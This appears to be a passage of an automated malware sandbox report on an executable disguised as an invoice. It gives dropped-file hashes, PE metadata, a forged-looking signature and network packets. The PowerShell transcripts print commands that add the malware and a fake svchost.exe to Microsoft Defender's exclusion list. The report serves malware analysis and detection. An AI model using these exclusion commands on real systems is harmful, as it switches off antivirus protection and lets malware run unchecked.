                                                                                                File Type:very short file (no magic)
                                                                                                Category:dropped
                                                                                                Size (bytes):1
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:U:U
                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                Malicious:false
                                                                                                Preview: 1
                                                                                                C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8
                                                                                                Entropy (8bit):2.75
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:in:i
                                                                                                MD5:749B0BD3C8124E098A08AA0ECA590D7B
                                                                                                SHA1:731F24480C1E9739638958D9B7FB1E55653C94E6
                                                                                                SHA-256:692D9951E42E736CC5E1018E5ADBC09D1041CA9D38270CBDEC5DD6B1C36E138F
                                                                                                SHA-512:131BB75FCCC6B6B3646D94086DCD3A3A90229B1757C00C9C1FB13C1B34C711BD8468E43099A179A7151741D7EEA5EECDD020351E7E6CD6EEDF2480367E06D392
                                                                                                Malicious:true
                                                                                                Preview: .....H
                                                                                                C:\Users\user\Documents\20210223\PowerShell_transcript.813848.L3gX1bPt.20210223153056.txt
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):894
                                                                                                Entropy (8bit):5.373377164598564
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:BxSAm7vBZqx2DOXUWeSuau1tiWWHjeTKKjX4CIym1ZJXkVuau1t2:BZMvjqoO+SqWqDYB1ZSL
                                                                                                MD5:A1AC553DA0F50C3DE5B07F4F4C85DF87
                                                                                                SHA1:C358B1D38F5424BFB903D39006695710DA4645D8
                                                                                                SHA-256:0461B9018620FD3162A60231D3F5DD85E6CFD3E53EBE1BAA435166027F9FBBD0
                                                                                                SHA-512:95BD23978E364355ADA09FCDA2E59EF34F438760364AFDF2F8D2495B3399D2AD02D8AB1A1A2EF5AAC848BF65A7D99E94AA4F4C47F283E0591D3AA435F54641C4
                                                                                                Malicious:false
                                                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20210223153139..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 813848 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe -Force..Process ID: 6992..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210223153140..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe -Force..
                                                                                                C:\Users\user\Documents\20210223\PowerShell_transcript.813848.SJL_vxhU.20210223153046.txt
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):5905
                                                                                                Entropy (8bit):5.456187185525732
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:BZijqNEfqDo1Z0fZQjqNEfqDo1ZsYLSLgLjZRjqNEfqDo1ZnPLwLwLzrZ9S:7
                                                                                                MD5:1D604BC8D0DDC87D733C0A75B0016AB9
                                                                                                SHA1:8FCBEE7F59C08E35D0DC9B258592E1805D591390
                                                                                                SHA-256:8FDE7DE54B1E8825F06756566CF8335650112AE653A7A72BC1C7E87B7F45717B
                                                                                                SHA-512:1CB64A0C73D17C4F1C59F841E1284223181DB3B7C56C1016AA0C9DB69CC277E179E3A1826A9F7061EF30F1C86752AF56F328371CA3E4B99C7AE5F404BCE6DDE2
                                                                                                Malicious:false
                                                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20210223153102..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 813848 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe -Force..Process ID: 5864..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210223153103..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210223153607..Usernam

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):4.356962652008706
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:CN-Invoice-XXXXX9808-19011143287989.exe
                                                                                                File size:634024
                                                                                                MD5:e9cd061b2286d8098153c9d9e2ed0b4b
                                                                                                SHA1:e30565df7c0597a76857532e4ca7df6d2728e7b5
                                                                                                SHA256:520fae27134b14bb92d3858083c08496cee8b1c7631f0a374c5e168adfa799f2
                                                                                                SHA512:6d878d2a3b9a6172196416e8cca9dc3bf0e73d0d8da2d37e343938141cc2887ee0df884f8b7cfb40f912d45c4b6a527313944dde47ed7590f0ffa54e87c54122
                                                                                                SSDEEP:6144:vLt3NCnZ05Bm8yB0VwxTLZR3yO7wVLTOY2QIDOvbqhUd5H/eIS/VNnUKEAwL:D1VVW0V2ybpTOYIUWfNpa
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}...............0.................. ........@.. ..............................0.....@................................

                                                                                                File Icon

                                                                                                Icon Hash:00828e8e8686b000

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x49abde
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                Time Stamp:0xF27DBEB9 [Tue Dec 2 02:51:37 2098 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:v4.0.30319
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                Authenticode Signature

                                                                                                Signature Valid:false
                                                                                                Signature Issuer:C=?????????????????????????????????????????????????, S=&#225;&#168;&#131;&#225;&#167;&#186;&#225;&#168;&#170;&#225;&#168;&#130;&#225;&#168;&#129;&#225;&#167;&#183;&#225;&#168;&#151;&#225;&#168;&#141;&#225;&#168;&#139;&#225;&#168;&#161;&#225;&#167;&#188;&#225;&#168;&#151;&#225;&#168;&#130;&#225;&#167;&#181;&#225;&#168;&#132;, L=&#226;&#182;&#133;&#226;&#182;&#173;&#226;&#182;&#169;&#226;&#182;&#133;&#226;&#182;&#146;&#226;&#181;&#189;&#226;&#182;&#130;&#226;&#182;&#136;&#226;&#182;&#157;&#226;&#182;&#179;&#226;&#182;&#138;&#226;&#182;&#139;&#226;&#182;&#132;&#226;&#182;&#178;&#226;&#182;&#148;&#226;&#182;&#163;&#226;&#182;&#144;&#226;&#182;&#174;&#226;&#182;&#131;&#226;&#182;&#169;&#226;&#181;&#188;&#226;&#182;&#128;&#226;&#182;&#170;&#226;&#182;&#162;&#226;&#182;&#181;&#226;&#182;&#132;&#226;&#182;&#135;&#226;&#181;&#190;&#226;&#182;&#181;&#226;&#182;&#142;&#226;&#182;&#164;&#226;&#182;&#175;&#226;&#182;&#132;&#226;&#181;&#191;&#226;&#182;&#146;&#226;&#182;&#136;&#226;&#182;&#145;&#226;&#182;&#148;&#226;&#182;&#158;, T=&#229;&#152;&#154;&#229;&#152;&#140;&#229;&#152;&#184;&#229;&#152;&#180;&#229;&#152;&#186;&#229;&#152;&#174;&#229;&#152;&#131;&#229;&#152;&#180;&#229;&#152;&#141;&#229;&#152;&#183;&#229;&#152;&#151;&#229;&#152;&#182;&#229;&#152;&#133;&#229;&#152;&#184;&#229;&#152;&#183;&#229;&#152;&#145;, E=???????????????????????????????????????, OU=&#226;&#136;&#174;&#226;&#136;&#151;&#226;&#136;&#157;&#226;&#136;&#148;&#226;&#136;&#146;&#226;&#136;&#189;&#226;&#136;&#140;&#226;&#136;&#138;&#226;&#136;&#186;&#226;&#136;&#138;&#226;&#136;&#135;&#226;&#136;&#183;&#226;&#136;&#135;&#226;&#136;&#156;&#226;&#136;&#170;&#226;&#136;&#183;&#226;&#136;&#156;&#226;&#136;&#169;&#226;&#136;&#175;&#226;&#136;&#179;&#226;&#136;&#185;&#226;&#136;&#190;&#226;&#136;&#158;&#226;&#136;&#154;&#226;&#136;&#179;&#226;&#136;&#169;&#226;&#136;&#139;&#226;&#136;&#178;&#226;&#136;&#188;&#226;&#136;&#156;&#226;&#136;&#144;, O=&#235;&#178;&#179;&#235;&#178;&#180;&#235;&#179;&#140;&#235;&#179;&#130;&#235;&#179;&#153;&#235;&#179;&#163;&#235;&#179;&#151;&#235;&#179;&#132;&#235;&#179;&#159;&#235;&#179;&#145;&#235;&#179;&#150;&#235;&#178;&#178;&#235;&#179;&#159;&#235;&#179;&#132;&#235;&#179;&#160;&#235;&#178;&#185;&#235;&#178;&#177;, CN=&#235;&#153;&#182;&#235;&#153;&#173;&#235;&#153;&#159;&#235;&#154;&#129;&#235;&#153;&#181;&#235;&#153;&#177;&#235;&#153;&#161;&#235;&#154;&#133;&#235;&#153;&#165;&#235;&#153;&#189;&#235;&#153;&#144;&#235;&#154;&#132;&#235;&#153;&#191;&#235;&#153;&#152;&#235;&#154;&#132;&#235;&#153;&#153;&#235;&#153;&#175;&#235;&#153;&#147;&#235;&#153;&#180;&#235;&#153;&#176;&#235;&#153;&#146;&#235;&#153;&#155;&#235;&#153;&#185;&#235;&#153;&#149;&#235;&#153;&#165;&#235;&#153;&#185;&#235;&#153;&#162;&#235;&#153;&#150;&#235;&#153;&#184;&#235;&#153;&#158;&#235;&#153;&#162;&#235;&#153;&#159;&#235;&#153;&#164;&#235;&#153;&#179;&#235;&#153;&#161;&#235;&#154;&#129;&#235;&#154;&#134;&#235;&#153;&#149;&#235;&#153;&#175;
                                                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                Error Number:-2146762487
                                                                                                Not Before, Not After
                                                                                                • 2/23/2021 1:43:21 AM 2/23/2022 1:43:21 AM
                                                                                                Subject Chain
                                                                                                • C=?????????????????????????????????????????????????, S=&#225;&#168;&#131;&#225;&#167;&#186;&#225;&#168;&#170;&#225;&#168;&#130;&#225;&#168;&#129;&#225;&#167;&#183;&#225;&#168;&#151;&#225;&#168;&#141;&#225;&#168;&#139;&#225;&#168;&#161;&#225;&#167;&#188;&#225;&#168;&#151;&#225;&#168;&#130;&#225;&#167;&#181;&#225;&#168;&#132;, L=&#226;&#182;&#133;&#226;&#182;&#173;&#226;&#182;&#169;&#226;&#182;&#133;&#226;&#182;&#146;&#226;&#181;&#189;&#226;&#182;&#130;&#226;&#182;&#136;&#226;&#182;&#157;&#226;&#182;&#179;&#226;&#182;&#138;&#226;&#182;&#139;&#226;&#182;&#132;&#226;&#182;&#178;&#226;&#182;&#148;&#226;&#182;&#163;&#226;&#182;&#144;&#226;&#182;&#174;&#226;&#182;&#131;&#226;&#182;&#169;&#226;&#181;&#188;&#226;&#182;&#128;&#226;&#182;&#170;&#226;&#182;&#162;&#226;&#182;&#181;&#226;&#182;&#132;&#226;&#182;&#135;&#226;&#181;&#190;&#226;&#182;&#181;&#226;&#182;&#142;&#226;&#182;&#164;&#226;&#182;&#175;&#226;&#182;&#132;&#226;&#181;&#191;&#226;&#182;&#146;&#226;&#182;&#136;&#226;&#182;&#145;&#226;&#182;&#148;&#226;&#182;&#158;, T=&#229;&#152;&#154;&#229;&#152;&#140;&#229;&#152;&#184;&#229;&#152;&#180;&#229;&#152;&#186;&#229;&#152;&#174;&#229;&#152;&#131;&#229;&#152;&#180;&#229;&#152;&#141;&#229;&#152;&#183;&#229;&#152;&#151;&#229;&#152;&#182;&#229;&#152;&#133;&#229;&#152;&#184;&#229;&#152;&#183;&#229;&#152;&#145;, E=???????????????????????????????????????, OU=&#226;&#136;&#174;&#226;&#136;&#151;&#226;&#136;&#157;&#226;&#136;&#148;&#226;&#136;&#146;&#226;&#136;&#189;&#226;&#136;&#140;&#226;&#136;&#138;&#226;&#136;&#186;&#226;&#136;&#138;&#226;&#136;&#135;&#226;&#136;&#183;&#226;&#136;&#135;&#226;&#136;&#156;&#226;&#136;&#170;&#226;&#136;&#183;&#226;&#136;&#156;&#226;&#136;&#169;&#226;&#136;&#175;&#226;&#136;&#179;&#226;&#136;&#185;&#226;&#136;&#190;&#226;&#136;&#158;&#226;&#136;&#154;&#226;&#136;&#179;&#226;&#136;&#169;&#226;&#136;&#139;&#226;&#136;&#178;&#226;&#136;&#188;&#226;&#136;&#156;&#226;&#136;&#144;, O=&#235;&#178;&#179;&#235;&#178;&#180;&#235;&#179;&#140;&#235;&#179;&#130;&#235;&#179;&#153;&#235;&#179;&#163;&#235;&#179;&#151;&#235;&#179;&#132;&#235;&#179;&#159;&#235;&#179;&#145;&#235;&#179;&#150;&#235;&#178;&#178;&#235;&#179;&#159;&#235;&#179;&#132;&#235;&#179;&#160;&#235;&#178;&#185;&#235;&#178;&#177;, CN=&#235;&#153;&#182;&#235;&#153;&#173;&#235;&#153;&#159;&#235;&#154;&#129;&#235;&#153;&#181;&#235;&#153;&#177;&#235;&#153;&#161;&#235;&#154;&#133;&#235;&#153;&#165;&#235;&#153;&#189;&#235;&#153;&#144;&#235;&#154;&#132;&#235;&#153;&#191;&#235;&#153;&#152;&#235;&#154;&#132;&#235;&#153;&#153;&#235;&#153;&#175;&#235;&#153;&#147;&#235;&#153;&#180;&#235;&#153;&#176;&#235;&#153;&#146;&#235;&#153;&#155;&#235;&#153;&#185;&#235;&#153;&#149;&#235;&#153;&#165;&#235;&#153;&#185;&#235;&#153;&#162;&#235;&#153;&#150;&#235;&#153;&#184;&#235;&#153;&#158;&#235;&#153;&#162;&#235;&#153;&#159;&#235;&#153;&#164;&#235;&#153;&#179;&#235;&#153;&#161;&#235;&#154;&#129;&#235;&#154;&#134;&#235;&#153;&#149;&#235;&#153;&#175;
                                                                                                Version:3
                                                                                                Thumbprint MD5:1B045FD5805BDB47ABBD5FE0A70F6768
                                                                                                Thumbprint SHA-1:D41A01D01D11B3718ED7010D5436E3C9D78F2F27
                                                                                                Thumbprint SHA-256:4B5BCDDAB23B84E36F11C395653121696D55DADB4D6C07752F27B1782146C092
                                                                                                Serial:0082B712181A23E355CA1B8C13A8B9877D

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x9ab840x57.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x9c0000x3e0.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x994000x18a8
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x9e0000xc.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x20000x98be40x98c00False0.352417591551data4.30688384543IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0x9c0000x3e00x400False0.46875data3.55517611534IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0x9e0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                RT_VERSION0x9c0580x388dataEnglishUnited States

                                                                                                Imports

                                                                                                DLLImport
                                                                                                mscoree.dll_CorExeMain

                                                                                                Version Infos

                                                                                                DescriptionData
                                                                                                LegalCopyrightCopyright 2022 GHNOsowI. All rights reserved.
                                                                                                Assembly Version0.2.3.8
                                                                                                InternalNameSKPwSvas.exe
                                                                                                FileVersion1.5.5.5
                                                                                                CompanyNameWFGMSaGe
                                                                                                LegalTrademarksEUIXPDQH
                                                                                                CommentsQzbmVavB
                                                                                                ProductNameSKPwSvas
                                                                                                ProductVersion0.2.3.8
                                                                                                FileDescriptionZJpSDQez
                                                                                                OriginalFilenameSKPwSvas.exe
                                                                                                Translation0x0409 0x0514

                                                                                                Possible Origin

                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                EnglishUnited States

                                                                                                Network Behavior

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Feb 23, 2021 15:30:32.282521963 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.336056948 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.336218119 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.337270021 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.390383005 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.676027060 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.676055908 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.676100969 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.676121950 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.676139116 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.676156044 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.676172972 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.676193953 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.676212072 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.676224947 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.676261902 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.676305056 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.677155018 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.677371979 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.677469969 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.678448915 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.678472042 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.678559065 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.679692984 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.679749012 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.679862022 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.680931091 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.680963993 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.681045055 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.682174921 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.682245970 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.682333946 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.683408976 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.683430910 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.683523893 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.684672117 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.684791088 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.684873104 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.685898066 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.685919046 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.686021090 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.687134027 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.687154055 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.687249899 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.688375950 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.688395977 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.688507080 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.729553938 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.729583025 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.729711056 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.730098963 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.730118036 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.730266094 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.731323957 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.731343985 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.731465101 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.732566118 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.732584953 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.732688904 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.733819962 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.733841896 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.733946085 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.735054970 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.735704899 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.735764980 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.735855103 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.736978054 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.736998081 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.737104893 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.738234043 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.738269091 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.738328934 CET4973780192.168.2.4172.67.172.17
                                                                                                Feb 23, 2021 15:30:32.739430904 CET8049737172.67.172.17192.168.2.4
                                                                                                Feb 23, 2021 15:30:32.739465952 CET8049737172.67.172.17192.168.2.4
